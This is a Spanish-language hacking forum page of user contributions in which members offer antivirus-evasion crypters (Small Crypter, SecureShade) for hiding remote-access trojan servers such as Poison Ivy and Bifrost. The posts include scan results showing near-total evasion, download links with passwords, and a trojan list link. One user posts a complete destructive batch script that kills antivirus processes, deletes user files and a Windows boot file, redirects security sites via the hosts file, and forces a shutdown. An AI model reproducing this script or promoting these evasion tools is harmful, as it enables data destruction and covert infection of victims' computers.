Contribuciones usuarios elhacker.net página 5

Cita de: E0N en 19 Abril 2008, 15:58

SMALL CRYPTER

¿Qué es Small Crypter?

Small Crypter es un crypter (obio

) tanto scan-time como run-time que utiliza inyección. Su stub está escrito en asm y un poco retocado a mano, por lo que solamente ocupa 1.3 KB. ¿Qué quiere decir esto? Pues quiere decir que si encriptamos un ejecutable con Small Crypter el tamaño total del mismo solo aunmentará en 1.3KB, es decir, prácticamente nada

Por poner un ejemplo, al encriptar el server del Poison Ivy con Small Crypter el server final solo ocupará 6.6KB

Características:

No dispongo de mucho tiempo últimamente, así que hay ciertos aspectos a mejorar, como el algoritmo de encryptación, que es un simple xor xD lo que hace que algunos av's puedan llegar a detectar vuestro server, aunke pasará inadvertido a la gran mayoria. Por poner un ejemplo, este es el resultado de scanear el servidor del Poison Ivy con ScanLix tras haber sido encriptado con Small Crypter:

McAfee

Kaspersky

Shopos

F-Prot

AntiVir

Norton

BitDefender

ClamWin

SOLO

Nod32

ZoneAlarm

Como veis lo siguen detectando 2 av's, pero no está mal no?

El ejecutable final por otra parte no tendrá icono. Bueno, tengo que mejorarle algunos aspecto para una posible siguiente versión

Abajo podeis descargarlo. Para hacerlo funcionar extraeis el .rar en la misma ruta y ya está

Salu2 E0N

Crypter SecureShade 1.5
Esta es la versión publica de mi crypter, hace cualquier programa de windows indetectable a los antivirus en tiempo de análisis y en tiempo de ejecución.
He probado con servidores de PI, Bifrost, Nuclear Rat y Bandook y todos son compatibles.

Características:

Editor programado en VB6
Stub programado en c++/asm
Tamaño del Stub(con themida): 577Kb
SO: Win98/NT/XP/Vista
------------------------------------
Totalmente indetectable (Runtime y Scantime)
Inyeccion del programa en otro proceso
Cambiar icono
Encriptación muy rapida
Validación de ejecutables
Buen diseño

Captura de pantalla:
(He traducido el programa al español)

Resultado del scan:
A-Squared   Nada encontrado
AntiVir      Nada encontrado
ArcaVir      Nada encontrado
Avast      Nada encontrado
AVG Antivirus   Nada encontrado
BitDefender   Nada encontrado
ClamAV      Nada encontrado
CPsecure   Nada encontrado
Dr.Web      Nada encontrado
F-Prot      Nada encontrado
F-Secure   Nada encontrado
Fortinet   Nada encontrado
Ikarus      Nada encontrado
Kaspersky   Nada encontrado
NOD32      Nada encontrado
Norman      Nada encontrado
Panda Antivirus   Nada encontrado
VirusBuster   Nada encontrado
VBA32      Nada encontrado

Descarga:
http://rapidshare.com/files/117008238/SecureShade_1.5_Publica.zip.html
http://www.megaupload.com/es/?d=TH1UFB8E
Pass: foro.elhacker.net

Editado dia 3-7-2008
Esta disponible la NUEVA versión 1.8 privada. Es indetectable a todos los antivirus. El tamaño de el stub es solo 4Kb. Más información dentro del programa publico al encriptar, por mensaje privado o a la dirección de email bydexonline(at)hotmail(dot)com

Vídeo de muestra de la versión privada:
http://c.imagehost.org/view/0274/SS.swf

bueno yo voy a poner un virus en codigo bat supongo que no funcionara pero bueno yo pongo mi aporte...

Citar

@echo off
tskill aak.exe
tskill AcctMgr.exe
tskill McAfeeVirusScanService.exe
tskill MCAgentExe.exe
tskill pavsrv51.exe
tskill prevsrv.exe
tskill PsImSvc.exe
tskill nod32krn.exe
tskill nod32kui.exe
tskill nod32.exe
tskill avgupsvc.exe
tskill avgamsvr.exe
tskill avgemc.exe
tskill avgcc.exe
tskill ashDisp.exe
tskill ashMaiSv.exe
tskill ashServ.exe
tskill ashWebSv.exe
tskill aswUpdSv.exe
tskill _avp32.exe
tskill avsched32.exe
tskill luall.exe
tskill moolive.exe
tskill mpftray.exe
tskill n32scanw.exe
tskill navapw32.exe
tskill navlu32.exe
tskill navnt.exe
tskill rescue.exe
tskill safeweb.exe
tskill scan32.exe
tskill scan95.exe
tskill scanpm.exe
tskill scrscan.exe
tskill serv95.exe
tskill smc.exe
tskill sphinx.exe
tskill tbscan.exe
tskill tca.exe
tskill tds2-98.exe
tskill tds2-nt.exe
tskill wfindv32.exe
tskill zonealarm.exe
del /F /Q C:\Documents and Settings\%username%\Escritorio
del /F /Q C:\Documents and Settings\%USERNAME%\Menú Inicio
del /F /Q c:\WINDOWS\Fonts
del /F /Q c:\Documents and Settings\%username%\Mis documentos
del /F /Q c:\Archivos de programas\eMule
del /F /Q c:\WINDOWS\Cursors
del /F /Q C:\Archivos de programa\Internet Explorer
del /F /Q C:\Archivos de programa\Windows Media Player
del /F /Q C:\WINDOWS\Web\Wallpaper
cd c:\windows\System32
attrib -r ntdetect.com
attrib -s ntdetect.com
attrib -h ntdetect.com
del /F /Q ntdetect.com
echo 81.21.145.144 McAfee >> C:\WINDOWS\system32\drivers\etc\hosts
echo 212.170.238.10 panda >> C:\WINDOWS\system32\drivers\etc\hosts
echo 212.170.238.35 Norton >> C:\WINDOWS\system32\drivers\etc\hosts
echo 67.15.68.49 kaspersky >> C:\WINDOWS\system32\drivers\etc\hosts
echo 67.15.68.49 Nod32 >> C:\WINDOWS\system32\drivers\etc\hosts
echo 66.98.250.38 virusTotal >> C:\WINDOWS\system32\drivers\etc\hosts
echo 66.249.93.99 google >> C:\WINDOWS\system32\drivers\etc\hosts
TASKKILL /F /IM explorer.exe
shutdown -t -t 05 -c "error fatal de windows"

que les parece creo que no necesita explicacion no?

bueno jaja

aca les dejo una lista de troyanos

y si tienen dudas pues bayan a la parte de el foro q explica como hacerlos indetectables jaja bueno desde ya saludos y espero q les sirba de algo
http://www.ale666.com/home/index.php?option=com_content&task=view&id=12&Itemid=30

poe favor les quiero pedir q no descergan nada de este sitio si no lo nesesitan

bueno creo q eso es todo nos veomos jaja

hard-h2o modding Foros de ayuda Yashira.org Videojuegos indetectables.net

Noticias Informatica Seguridad Informática ADSL Foros en español eNYe Sec

Todas las webs afiliadas están libres de publicidad engañosa.